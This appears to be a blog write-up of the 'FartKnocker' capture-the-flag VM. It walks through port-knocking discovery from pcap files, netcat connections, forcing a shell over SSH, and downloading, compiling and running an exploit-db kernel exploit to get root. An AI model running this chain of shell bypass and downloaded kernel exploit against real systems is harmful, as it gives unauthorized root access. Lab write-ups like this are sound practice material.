FartKnocker – CTF Walkthrough

Start the Virtual machine and use Netdiscover to find its IP Address. Register this IP to your local DNS file “/etc/hosts”.

sudo netdiscover -r [IP/subnet]
sudo nano /etc/hosts

 

Run a full port Nmap scan.

 

There’s no port open except HTTP. Open this on your browser.

Click on the link below, you’ll be prompted to download a file.

 

This is a “pcap” file. when you open this file in Wireshark, you’ll see a knocking pattern on port no 7000, 8000, 9000, 7000, 8000. Apply TCP filter to see the pattern.

 

Now, I’ll use a utility “knock” to knock these ports install Knockd

sudo apt install knockd
knock knock.local 7000 8000 9000 7000 8000
nmap -p- knock.local

 

By running Nmap scan, you can see a new port is open. By running Nmap, this port might become closed, knock again and use Netcat to connect to this port.

knock knock.local 7000 8000 9000 7000 8000
nc -v knock.local 8888

 

This port has revealed a new directory on the Web Server, which contains another PCAP file.

 

Again, open this file in Wireshark and follow TCP stream on port 8080.

 

Use Google Translate to translate this message.

 

So the next knocking sequence is 1, 3, 3, 7. Knock and run Nmap.

knock knock.local 1 3 3 7
nmap -p- knock.local

 

A new port opened, use Netcat to connect to it.

 

Open the new directory revealed by this port.

 

There is a base64 encoded message. Decode it by

echo T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK | base64 -d

 

Knock again and then run Nmap.

 

An SSH port is open, try to connect to it.

 

Connect to the SSH again using given credentials.

 

The shell opened for a few seconds and then closed. Try including the shell manually

ssh butthead@knock.local '/bin/bash'

 

We got a lower shell, now we need to get root. Run “uname -a” to check Kernel’s version.

 

Check exploit DB for any related exploits.

 

We found an exploit. Now, download this exploit using “wget”.

wget https://www.exploit-db.com/download/37292

 

Now compile this exploit using “gcc” and run it.

mv 37292 priv.c
gcc priv.c -o priv -pthread
./priv

And here’s the ROOT Flag!!

Leave a Reply

Your email address will not be published. Required fields are marked *